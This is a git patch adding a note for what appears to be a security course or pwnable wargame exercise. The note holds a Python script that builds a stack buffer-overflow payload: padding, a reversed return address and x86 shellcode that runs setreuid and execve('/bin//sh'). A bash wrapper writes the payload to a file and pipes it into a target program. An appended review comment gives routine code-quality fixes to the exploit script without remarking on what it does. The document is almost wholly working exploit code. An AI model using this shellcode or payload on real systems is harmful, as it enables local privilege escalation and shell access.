From 585fbd68c8790cfee79186385e59ec32746f9234 Mon Sep 17 00:00:00 2001 From: Recolic Keghart <root@recolic.net> Date: Mon, 4 Feb 2019 14:42:38 -0800 Subject: [PATCH] tmp --- proj1/note | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 proj1/note diff --git a/proj1/note b/proj1/note new file mode 100644 index 0000000..4b7e067 --- /dev/null +++ b/proj1/note @@ -0,0 +1,34 @@ +pwnable:~$ cat egg +#!/bin/bash + +./egg3 && cat input.txt | invoke dejavu + +pwnable:~$ cat egg3 +#!/usr/bin/python3 + +def fuck8(txt): + assert(len(txt) == 8) + return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2] + +def revert(txt): + assert(len(txt) % 8 == 0) + res = "" + for i in range(int(len(txt) / 8)): + res += fuck8(txt[i*8:(i+1)*8]) + return res + + +fill = "0123456789abcdef0123456789abcdef01234567" +raddr = "bffffa50" # "bffffa50" +#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" +shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd8000" + +payload = revert(fill) + revert(raddr) + (shellcode) +print(payload) + +import binascii + +b = binascii.unhexlify(payload) +with open('input.txt','wb+') as f: + f.write(b) + -- GitLab
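Review bot: In `revert` the chunk count is computed as `int(len(txt) / 8)`, which goes through float division only to truncate again; `len(txt) // 8` is the integer form and the loop then reads `for i in range(len(txt) // 8):`. The length checks in `fuck8` and `revert` are `assert` statements, which are stripped when the script runs under `python3 -O`, so a `fill` or `raddr` of the wrong length would then be silently mis-sliced; `if len(txt) % 8: raise ValueError("length must be a multiple of 8")` keeps the check unconditional. `open('input.txt','wb+')` requests read access that is never used, so `'wb'` is sufficient. Indentation of the embedded scripts appears collapsed in this rendering of the hunk, so the block structure above is inferred from the 34-line count rather than visible.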